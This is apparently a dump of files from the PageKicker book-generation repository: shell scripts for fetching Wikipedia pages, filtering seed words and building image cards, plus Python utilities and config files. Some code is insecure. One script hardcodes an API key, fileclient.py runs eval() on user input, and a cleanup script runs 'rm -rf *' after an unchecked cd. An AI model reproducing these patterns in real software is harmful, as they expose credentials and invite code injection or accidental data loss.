*** \"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\n\n. includes/set-variables.sh\n\n# argparse\n# $1 is inbound seedphrases file\n# $2 is verbose\n\necho \"uuid received is $uuid\"\n\nmkdir -p -m 777 $TMPDIR\nmkdir -p -m 777 $TMPDIR$uuid\nmkdir -p -m 777 $TMPDIR$uuid/seeds\n\nwhile read -r line; do\n\nif grep -qw \"$line\" \"seeds/disallowed-seeds.txt\" ; then\n\n\techo \"the seed \"$line \"was disallowed\"\n\tdisallowed=\"$disallowed\"\"\\n \"\"$line\"\n\nelse\n\tif [ \"$2\" = \"v\" ] ; then\n\t\techo \"$line is not a naughty word -- your momma raised you right!\"\n\telse\n\t\ttrue\n\t\techo \"$line is not a naughty word -- your momma raised you right!\"\n\tfi\n\n\techo \"$line\" >> $TMPDIR$uuid/seeds/allowed_seeds.txt\nfi\n\n\ndone <$1\n\ncp $TMPDIR$uuid/seeds/allowed_seeds.txt $TMPDIR$uuid/seeds/seedphrases\n\nif [ -z ${disallowed+x} ] ; then\n\techo \"I checked your seeds to be sure there were no naughty words -- your momma raised you right!\" >> $TMPDIR$uuid/seeds/process.md\n\nelse\n\tsendemail -t \"$customer_email\" \\\n\t\t-m \"Disallowed words removed from $booktitle\\n: $disallowed\" \\\n\t\t-u \"Disallowed words removed from $booktitle.\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-o tls=yes\nfi\n\necho \" * * * DONE CHECKING NAUGHTY WORDS * * * \"\nexit 0\n" }, { "alpha_fraction": 0.6040342450141907, "alphanum_fraction": 0.6236529350280762, "avg_line_length": 35.918365478515625, "blob_id": "7bb7b5ae87b3c74a7613f49e5aef03c375027085", "content_id": "3317575c833e5fae1478a6eaaf808778db876d89", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3619, "license_type": "permissive", "max_line_length": 521, "num_lines": 98, "path": "/scripts/includes/fetch-linked-documents.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\t# fetch the documents for this seed\n\n\t# start with seed document \n\t\n\tcount=1\n\n\tseedfetchurlbase=\"http://\"$wikilocale\".wikipedia.org/w/index.php?action=render&title=\"\n\tseedfetchurl=$seedfetchurlbase$safeseed\n\n\tcurl --verbose --connect-timeout 60 --max-time 600 --max-redirs 1 --junk-session-cookies -o tmp/seed_document.html $seedfetchurl\n\nif [ $fetched_document_format= \"txt\" ] ; then\n\n\n\thtml2text -style pretty -nobs tmp/$uuid/seed_document.html > tmp/$uuid/seed_document.txt\n\nelse\n\n\techo \"no need to convert seed doc to txt\" | tee --append $sfb_log\n\nfi\n\n\techo 'processing fetch list' | tee --append $sfb_log\n\n\twhile IFS='\t' read title \n\t\tdo\t\n\t\t\t\n\t\techo \"title is \" $title\n\n\t\tsafetitle=$(echo $title | sed -e 's/%/%25/g' -e 's/ /%20/g' -e 's/!/%21/g' -e 's/\"/%22/g' -e 's/#/%23/g' -e 's/\\$/%24/g' -e 's/\\&/%26/g' -e 's/'\\''/%27/g' -e 's/(/%28/g' -e 's/)/%29/g' -e 's/\\*/%2a/g' -e 's/+/%2b/g' -e 's/,/%2c/g' -e 's/-/%2d/g' -e 's/\\./%2e/g' -e 
\n\n\t\techo \"safetitle is \" $safetitle\n\n\n\t\tfetchurlbase=\"http://en.wikipedia.org/w/index.php?action=render&title=\"\n\t\techo \"fetchurlbase is\" $fetchurlbase | tee --append $sfb_log\n\t\tfetchurl=$fetchurlbase$safetitle\n\t\techo \"url to be fetched is\" $fetchurl | tee --append $sfb_log\n\n\t\t# shall we be polite?\n\n\t\t# sleep 1\n\n\t\t# implement curl persistent connection\n\t\t# implement curl connection tracking\n\n\t\tcurl --silent --compressed --retry 2 --retry-delay 5 --retry-max-time 15 --connect-timeout 30 --max-time 60 --max-redirs 2 --junk-session-cookies -o tmp/$uuid/$count.tmp $fetchurl\t\t\n\n\t\techo \"fetched document on \" $title \" and saved it to tmp/\"$uuid/$count\".tmp\" | tee --append $sfb_log\n\n\t\t# remove img links from count.tmp\n\n\n\n\t\tif [ \"$fetched_document_format\" = \"txt\" ] ; then\n\n\t\t\techo \"fetched document format is \" $fetched_document_format | tee --append $sfb_log\n\n\t\t\tsed -e \"s/<img[^>]*[^>]*>/images deleted/g\" -e \"s/'\\[edit\\]'//g\" tmp/$uuid/$count.tmp | sed '/table id=\"toc\" class=\"toc\"/,/table>/d' > tmp/$uuid/$count.html\n\n\t\t\thtml2text -style pretty -nobs tmp/$uuid/$count\".html\" > tmp/$uuid/$count.txt\n\t\t\techo \"ran html2text on tmp/\" $uuid/$count\".html\" | tee --append $sfb_log\n\n\n\t\t\techo \"#\" \"Chapter \" $count\". \"$title >> tmp/$uuid/tmp.cumulative.txt\n\t\t\techo \"#\" $h1 \"Chapter \" $count\". \"$title $h1end >> tmp/$uuid/stored-toc-entries.html\n\t\t\tcat tmp/$uuid\"/\"$count\".txt\" >> tmp/$uuid/tmp.cumulative.txt\n\n\n\t\telse\n\t\t\n\t\t\techo \"fetched document format is \" $fetched_document_format | tee --append $sfb_log\n\n\t\t cat tmp/$uuid/$count.tmp | sed -e \"s/<img[^>]*[^>]*>/images deleted/g\" -e \"s/'\\[edit\\]'//g\" | sed '/table id=\"toc\" class=\"toc\"/,/table>/d' > tmp/$uuid/$count\".html\"\n\n\t\t\techo $h1 \"Chapter \" $count\". \"$title $h1end >> tmp/$uuid/tmp.cumulative.html\n\t\t\techo $h1 \"Chapter \" $count\". 
\"$title $h1end >> tmp/$uuid/stored-toc-entries.html\n\t\t\tcat tmp/$uuid\"/\"$count\".html\" >> tmp/$uuid/tmp.cumulative.html\n\n\t\t\thtml2text -style pretty -nobs tmp/$uuid/tmp.cumulative.html > tmp/$uuid/tmp.cumulative.txt\n\n\t\tfi\n\n\t\t# writes titles to descriptions temp file\n\n\t\techo $title $p >> tmp/$uuid\"/stored-descriptions.html\"\n\t\t# echo \"added\" $title \"to temporary html and txt files that hold all descriptions\" | tee --append tmp/stored-descriptions.html\t\n\t\t\n\t\t# reports on status of fetches\n\n\t\techo \"number of docs fetched so far on seed\" $seed \"is \" $count \"out of \" $doccount | tee --append $sfb_log\n\n\t\tcount=$((count+1))\n\n\t\n\tdone <fetch/$uuid/titles.txt\n" }, { "alpha_fraction": 0.699999988079071, "alphanum_fraction": 0.7799999713897705, "avg_line_length": 23.5, "blob_id": "6b0b94c3ffeaa8abf469fa1eb9f5fa7d8048247e", "content_id": "6ccf89c0a68b2a181a24434957c356c825d513de", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 51, "license_type": "permissive", "max_line_length": 28, "num_lines": 2, "path": "/conf/jobprofiles/imprints/xmedialab/xmedialabcopyrightpage.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Copyright © 2016 X Media Lab\nAll Rights Reserved\n\n" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 43, "blob_id": "ca832220a484830e1cdd342869b43fbe24bc8690", "content_id": "c5396d7d4329c9628ea8bd5e811bc3808a65e7aa", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "permissive", "max_line_length": 43, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Eileen_Smith.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Very interested in classical music and art.\n" }, { "alpha_fraction": 0.6002084016799927, "alphanum_fraction": 0.6161862015724182, "avg_line_length": 28.37755012512207, "blob_id": "1ddff27e36f8b9ea637a4b01b585afa9204557d6", "content_id": "d15143a78b8c6a7878a76f47e1d84688369af53f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2879, "license_type": "permissive", "max_line_length": 83, "num_lines": 98, "path": "/scripts/bin/nerv35.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n# Jeffrey Herbstman\n# nerv3.py\n# Goal: Named entity recognition script to pull names/place from text\n# called as python nerv3.py text_path_or_file\n#\n# Inputs:\n# path - text file or directory containing text files\n# output - output file name\n# Outputs:\n# Output file written\n#\n###################################################\n\nfrom watson_developer_cloud import AlchemyLanguageV1\nimport argparse\nimport xml.etree.ElementTree as ET\nimport requests\nimport codecs\nimport os\n\n#=================================================\ndef listwrite(output_file,thelist):\n\tfor item in thelist:\n\t\titem.encode('utf-8')\n\t\toutput_file.write(\"%s\\n\" % item)\n\n#=================================================\n\ndef main():\n\n\ttmpdir = \"/tmp/pagekicker\"\n\n\t#personal api key saved as api_key.txt\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('path', help = \"target file or directory for NER\")\n\tparser.add_argument('outfile', help = 
\"target file for output\")\n\tparser.add_argument('uuid', help = \"uuid\")\n\targs = parser.parse_args()\n\n\tin_file = args.path\n\tout_file = args.outfile\n\tuuid = args.uuid\n\tfolder = os.path.join(tmpdir, uuid)\n\tprint(folder)\n\n\n\twith open(in_file, 'rb') as f:\n\t\ttext = f.read()\n\n\tAlchemyApi_Key = 'b887e176b6a650093c3d4ca635cd1b470be6584e'\n\turl = 'https://gateway-a.watsonplatform.net/calls/text/TextGetRankedNamedEntities'\n\tpayload = { 'apikey': AlchemyApi_Key,\n 'outputMode': 'xml',\n 'text': text,\n 'max_items': '3'\n }\n\n\tr = requests.post(url,payload)\n\n\troot = ET.fromstring(r)\n\n\tplace_list = ['City', 'Continent', 'Country', 'Facility', 'GeographicFeature',\\\n\t'Region', 'StateOrCounty']\n\tPeople = {}\n\tPlaces = {}\n\tOther = {}\n\n\tfor entity in root.getiterator('entity'):\n\t\tif entity[0].text == 'Person':\n\t\t\tPeople[entity[3].text]=[entity[1].text, entity[2].text]\n\t\telif entity[0].text in place_list:\n\t\t\tPlaces[entity[3].text] = [entity[1].text, entity[2].text]\n\t\telse:\n\t\t\tOther[entity[3].text] = [entity[1].text, entity[2].text]\n\n\t#print lists ordered by relevance\n\tPlaces_s = sorted(Places, key = Places.get, reverse = True)\n\tPeople_s = sorted(People, key = People.get, reverse = True)\n\tOther_s = sorted(Other, key = Other.get, reverse = True)\n\n\twith codecs.open(out_file, mode = 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, People_s)\n\t\tlistwrite(o, Places_s)\n\t\tlistwrite(o, Other_s)\n\tout_file = os.path.join(folder, 'People')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, People_s)\n\tout_file = os.path.join(folder, 'Places')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, Places_s)\n\tout_file = os.path.join(folder, 'Other')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, Other_s)\n#=================================================\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.7192851901054382, "alphanum_fraction": 0.7215189933776855, "avg_line_length": 32.57500076293945, "blob_id": "8d2be5237f3341209191be2b8cc75bb258e984d0", "content_id": "752afb33002f74daeebaa3743401199f91bbb881", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1343, "license_type": "permissive", "max_line_length": 121, "num_lines": 40, "path": "/scripts/includes/content-collections-first.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# --booktype=\"draft-report\"\n# Front and back matter are minimized, candidate sentences for executive\n# summary are provided.\"\n\n# 1. create any unique parts of the book that are needed\n# 2. 
{ "alpha_fraction": 0.7192851901054382, "alphanum_fraction": 0.7215189933776855, "avg_line_length": 32.57500076293945, "blob_id": "8d2be5237f3341209191be2b8cc75bb258e984d0", "content_id": "752afb33002f74daeebaa3743401199f91bbb881", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1343, "license_type": "permissive", "max_line_length": 121, "num_lines": 40, "path": "/scripts/includes/content-collections-first.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# --booktype=\"draft-report\"\n# Front and back matter are minimized, candidate sentences for executive\n# summary are provided.\n\n# 1. create any unique parts of the book that are needed\n# 2. concatenate them and deliver complete.md to the builder.\n\n# tweak pp_summary to create Executive_summary\n\n\nsummary_length=\"5\"\necho \"creating executive summary\"\n\"$PYTHON_BIN\" bin/PKsum-clean.py -l \"$summary_length\" -o \"$TMPDIR$uuid/exec_summary.txt\" \"$TMPDIR$uuid/clean_summary.txt\"\n\necho By \"$editedby\" >> \"$TMPDIR$uuid/titletop.md\"\necho \" \" >> \"$TMPDIR$uuid/titletop.md\"\n\necho \"# EXECUTIVE SUMMARY\" >> \"$TMPDIR$uuid/executive_summary.md\"\necho \" \" >> \"$TMPDIR$uuid/executive_summary.md\"\ncat \"$TMPDIR$uuid/exec_summary.txt\" >> \"$TMPDIR$uuid/executive_summary.md\"\n\ncat \\\n\"$TMPDIR$uuid/titletop.md\" \\\n\"$TMPDIR$uuid/executive_summary.md\" \\\n\"$TMPDIR$uuid/content_collections/content_collections_results.md\" \\\n\"$TMPDIR$uuid/add_this_content.md\" \\\n\"$TMPDIR$uuid/chapters.md\" \\\n\"$TMPDIR$uuid/googler.md\" \\\n\"$TMPDIR$uuid/googler-news.md\" \\\n\"$TMPDIR$uuid/sorted_uniqs.md\" \\\n\"$TMPDIR$uuid/analyzed_webpage.md\" \\\n\"$TMPDIR$uuid/acronyms.md\" \\\n\"$TMPDIR$uuid/sources.md\" \\\n\"$TMPDIR$uuid/yaml-metadata.md\" \\\n\"$TMPDIR$uuid/settings.md\" \\\n> \"$TMPDIR$uuid/content-collections-first.md\"\n\n# \"$TMPDIR$uuid/conclusion.md\"\n# \"$TMPDIR$uuid/appendices_front_page.md\" \\\n" }, { "alpha_fraction": 0.7066115736961365, "alphanum_fraction": 0.7066115736961365, "avg_line_length": 29.25, "blob_id": "beac0ba5b7dc6f5ebb9e78d0697017965513b2c5", "content_id": "758494a6d1872f909a8a6fb6bfb7b6f7038f02e8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 242, "license_type": "permissive", "max_line_length": 84, "num_lines": 8, "path": "/scripts/includes/keywordreader.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#meta keywords below\n\necho -n '\"' | tee --append $metadatatargetpath$uuid/\"current-import.csv\"\nwhile read keyword\ndo\n\techo -n ''$keyword', ' | tee --append $metadatatargetpath\"$uuid/current-import.csv\"\n\ndone < \"tmp/\"$uuid/$sku\"keywords.txt\"\n" }, { "alpha_fraction": 0.6031909584999084, "alphanum_fraction": 0.6160576343536377, "avg_line_length": 35.727272033691406, "blob_id": "b045ce54ff4216aebcd59925497b44ce0dce2adc", "content_id": "574b486a3c8b5ca5f1525ba28d8782dcad345b19", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2020, "license_type": "permissive", "max_line_length": 106, "num_lines": 55, "path": "/scripts_python_3/bitcoin/fileclient/fileclient.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport json\n\nfrom two1.wallet import Wallet\nfrom two1.bitrequests import BitTransferRequests\n\n# set up bitrequest client for BitTransfer requests\nwallet = Wallet()\nrequests = BitTransferRequests(wallet)\n\n# server address\nserver_url = 'http://localhost:5000/'\n\n\ndef buy_file():\n # get the file listing from the server\n response = requests.get(url=server_url+'files')\n file_list = json.loads(response.text)\n\n # print the file list to the console\n for file in range(len(file_list)):\n print((\"{}. 
{}\\t{}\".format(file+1, file_list[str(file+1)][0], file_list[str(file+1)][1])))\n\n try:\n # prompt the user to input the index number of the file to be purchased\n sel = eval(input(\"Please enter the index of the file that you would like to purchase:\"))\n\n # check if the input index is valid key in file_list dict\n if sel in file_list:\n print(('You selected {} in our database'.format(file_list[sel][0])))\n\n # create a 402 request with the server payout address\n sel_url = server_url+'buy?selection={0}&payout_address={1}'\n answer = requests.get(url=sel_url.format(int(sel), wallet.get_payout_address()), stream=True)\n\n if answer.status_code != 200:\n print(\"Could not make an offchain payment. Please check that you have sufficient buffer.\")\n else:\n # open a file with the same name as the file being purchased and stream the data into it.\n filename = file_list[str(sel)][0]\n\n with open(filename, 'wb') as fd:\n for chunk in answer.iter_content(4096):\n fd.write(chunk)\n fd.close()\n print('Congratulations, you just purchased a file for bitcoin!')\n\n else:\n print(\"That is an invalid selection.\")\n\n except ValueError:\n print(\"That is an invalid input. Only numerical inputs are accepted.\")\n\nif __name__ == '__main__':\n buy_file()\n" }, { "alpha_fraction": 0.6346153616905212, "alphanum_fraction": 0.6730769276618958, "avg_line_length": 16.33333396911621, "blob_id": "85e2d4986aca3a7c97c805cd43d11c5cd0d9f3e0", "content_id": "27cc48a69f678c8243dc2dc856073ef5ee0bf782", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 52, "license_type": "permissive", "max_line_length": 20, "num_lines": 3, "path": "/test/dat_test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# xform launches DAT\nbin/xform.sh $1 $2\n" }, { "alpha_fraction": 0.7470816969871521, "alphanum_fraction": 0.7626459002494812, "avg_line_length": 255, "blob_id": "03492ee1eea484773210a913a2cfbd7fbb3294c7", "content_id": "4cb06754221c380049a547b1f9c313f9e8cab2df", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 257, "license_type": "permissive", "max_line_length": 255, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Iron_Mike.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Iron Mike was built by United States Robots and Mechanical Men (USR) in the year 2049, although he was original designed by Rossum's Universal Robots (RUR). When he's not writing, he enjoys playing with his pet mouse, Algernon. 
His favorite song is \"Daisy Bell\".\n" }, { "alpha_fraction": 0.6672897338867188, "alphanum_fraction": 0.6915887594223022, "avg_line_length": 25.799999237060547, "blob_id": "cb67b2aabd4dcdbca2a8033aca79be8607f9c0bf", "content_id": "d39cd6cc3a8daed10dda29eeaa00366890e3e267", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 535, "license_type": "permissive", "max_line_length": 114, "num_lines": 20, "path": "/scripts_python_3/bin/convert_user_webform_to_test.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 22 11:16:16 2015\n\n@author: fred\n\nConverts webform xml file submitted by user to anonymized format suitable \nfor testing\n\"\"\"\n\nimport fileinput\nimport re\nimport os\n\nscriptpath_substitution = '<scriptpath>' + os.getcwd() + '</scriptpath>'\n \nfor line in fileinput.input():\n line = re.sub('<customer_email>.*</customer_email>','<customer_email>[email protected]</customer_email>', line.rstrip())\n line = re.sub('<scriptpath>.*</scriptpath>', scriptpath_substitution, line.rstrip())\n print(line)" }, { "alpha_fraction": 0.4902634620666504, "alphanum_fraction": 0.6975945234298706, "avg_line_length": 15.471697807312012, "blob_id": "e06a7fcef9a1516abd6bb789bcee65ae1e7c4aa7", "content_id": "f22317b891b72c103626fc00ba433b109cddf1e1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 873, "license_type": "permissive", "max_line_length": 30, "num_lines": 53, "path": "/all_pk_and_pk21_requirements.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "arrow==0.8.0\nbase58==0.2.3\nbeautifulsoup4==4.5.1\nclick==6.6\ndecorator==4.0.10\ndocker-py==1.8.0\nflake8==3.0.4\nFlask==0.10.1\nfuncsigs==1.0.2\nfuture==0.15.2\nhealthcheck==1.3.1\nitsdangerous==0.24\nJinja2==2.8\njsonrpcclient==2.0.1\njsonrpcserver==3.1.1\njsonschema==2.5.1\nMarkupSafe==0.23\nmccabe==0.5.2\nmnemonic==0.13\nnetworkx==1.11\nnltk==3.2.1\nnumpy==1.11.1\npath.py==8.2.1\npbkdf2==1.3\npbr==1.10.0\npexpect==4.2.1\nprotobuf==3.0.0a3\npsutil==4.3.0\nptyprocess==0.5.1\npy==1.4.31\npyaes==1.6.0\npycodestyle==2.0.0\npyflakes==1.2.3\npysolr==3.5.0\npytest==3.0.2\npython-dateutil==2.5.3\nPyYAML==5.4.1\nrequests==2.11.1\nscikit-learn==0.17.1\nscipy==0.18.1\nsha256==0.1\nsix==1.10.0\nsklearn==0.0\nstevedore==1.17.1\ntabulate==0.7.5\ntwo1==3.9.1\nvirtualenv==15.0.3\nvirtualenv-clone==0.2.6\nvirtualenvwrapper==4.7.2\nwatson-developer-cloud==0.18.0\nwebsocket-client==0.37.0\nWerkzeug==0.11.10\nwikipedia==1.4.0\n" }, { "alpha_fraction": 0.6714285612106323, "alphanum_fraction": 0.6714285612106323, "avg_line_length": 13, "blob_id": "6f8aa4545fc7e004231f92de24a9820a94440c21", "content_id": "47709106fc7c7cf33884793c83756edf2a2b393a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 70, "license_type": "permissive", "max_line_length": 41, "num_lines": 5, "path": "/scripts/bin/cleanup_tmp_directories.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!bin/bash\n\n# file cleanup\n\ncd $SFB_MAGENTO_HOME/var/import; rm -rf *\n" }, { "alpha_fraction": 0.6635817885398865, "alphanum_fraction": 0.6883441805839539, "avg_line_length": 23.527606964111328, "blob_id": "ddbd4e916c603fb460f941cf23cf9bbc2122da4d", "content_id": "533792341e36e05fa9aa454665a4a649872c195e", "detected_licenses": 
[ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3998, "license_type": "permissive", "max_line_length": 240, "num_lines": 163, "path": "/scripts/bin/memecard.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n\n\necho \"****MEMECARD****\"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\n\nTMPDIR=\"/tmp/pagekicker/\"\nuuid=\"memecard\" && mkdir -p $TMPDIR\"$uuid\"\nconfdir=\"$confdir\"\nmemewidth=1200\nmemeheight=630\nmemebackgroundcolor=\"white\"\nmemefillcolor=\"black\"\nmemeheadlinefont=\"DejaVu-Sans-Bold\"\n\n. includes/set-variables.sh\n\necho \"version is\" $SFB_VERSION\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"for help review source code for now\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n-U|--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n-f|--infile)\ninfile=$2\nshift 2\n;;\n--infile=*)\ninfile=${1#*=}\nshift\n;;\n-t|--tldr)\ntldr=$2\nshift 2\n;;\n--tldr=*)\ntldr=${1#*=}\nshift\n;;\n-F|--font)\nfont=$2\nshift 2\n;;\n--font=*)\nfont=${1#*=}\nshift\n;;\n-w|--memewidth)\nmemewidth=$2\nshift 2\n;;\n--memewidth=*)\nmemewidth=${1#*=}\nshift\n;;\n-h|--memeheight)\nmemeheight=$2\nshift 2\n;;\n--memeheight=*)\nmemeheight=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\nif [ ! 
\"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 777 \"$TMPDIR\"$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 777 \"$TMPDIR\"$uuid\nfi\n\ncp \"$infile\" $TMPDIR$uuid/tmp.md\n\n# create title bar & version label\nconvert -units pixelsperinch -density 300 -size 1000x50 -border 5 -background \"$backgroundcolor\" -font \"$memeheadlinefont\" -fill \"$memefillcolor\" -background \"$memebackgroundcolor\" -gravity center caption:\"$tldr\" $TMPDIR$uuid/toplabel1.png\nconvert -units pixelsperinch -density 300 -size 500x25 -font \"Utopia\" -background white -fill black -gravity southeast caption:\"$SFB_VERSION\" $TMPDIR$uuid/version.png\n\n# prepend pagenumbering to tmp file\n\necho -e '\\pagenumbering{gobble}\\n' | cat - $TMPDIR$uuid/\"tmp.md\" > $TMPDIR$uuid/out && mv $TMPDIR$uuid/out $TMPDIR$uuid/\"tmp.md\"\n\n# make pdf\n\n# make pdf\n\ncat $TMPDIR$uuid/\"tmp.md\" | \\\n pandoc --latex-engine=xelatex --template=$confdir\"pandoc_templates/nonumtemplate.tex\" \\\n-o $TMPDIR$uuid/memecard.pdf\n# -V \"geometry:paperheight=5.0in\" -V \"geometry:paperwidth=7.0in\"\n\n# make png of text\nconvert -density 400 $TMPDIR$uuid/memecard.pdf -trim $TMPDIR$uuid/memecard.png\n# \"if error issued here see comments in includes/1000x3000skyscraper.sh for explanation\"\n\n# lay logo & version onto bottom label\n\nconvert $TMPDIR$uuid/memecard.png -border 30 $TMPDIR$uuid/memecard.png\n# put logo on 1000 px wide & trim\nconvert $scriptpath\"assets/pk35pc.jpg\" -resize 20% $TMPDIR$uuid/pksmall.jpg\nconvert $TMPDIR$uuid\"/pksmall.jpg\" -gravity west -background white -extent 1024x50 \\\n$TMPDIR$uuid/memecardlogo.png\n convert -gravity center $TMPDIR$uuid/memecardlogo.png -gravity southeast $TMPDIR$uuid/version.png -composite $TMPDIR$uuid/bottom.png\n\n# lay image of text onto card background\nmontage $TMPDIR$uuid/toplabel1.png \\\n$TMPDIR$uuid\"/memecard.png\" \\\n$TMPDIR$uuid/bottom.png \\\n-geometry \"$memewidth\"x\"$memeheight\" -border 10 -tile 1x10 -mode concatenate \\\n$TMPDIR$uuid/memecard.png\n\n# create card for delivery to desitnation\n\nconvert $TMPDIR$uuid\"/memecard.png\" -trim -border 30 $TMPDIR$uuid/memecard_delivery.png\n\necho \"built memecard and delivered it to $TMPDIR$uuid/memecard_delivery.png\"\n" }, { "alpha_fraction": 0.6396163702011108, "alphanum_fraction": 0.6503135561943054, "avg_line_length": 20.0155029296875, "blob_id": "e884aec56192db1149805905d30c768b7604be23", "content_id": "b922fc46898f7bd20672e43a93100a470bfe2873", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2711, "license_type": "permissive", "max_line_length": 117, "num_lines": 129, "path": "/scripts/naughty-dupes.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# searches for permitted content in Wikipedia\n\n# requires seed value\n\nstarttime=$(( `date +%s` ))\n\n# parse the command-line very stupidly\n\necho \"-NAUGHTY-NAUGHTY-DUPLICATE-DUPLICATE\" | tee --append $xform_log\necho \"starting to screen list of search terms for illegal ones\"| tee --append $xform_log\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires PDF filename; example: montageur.sh filename\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--infile)\ninfile=$2\nshift 
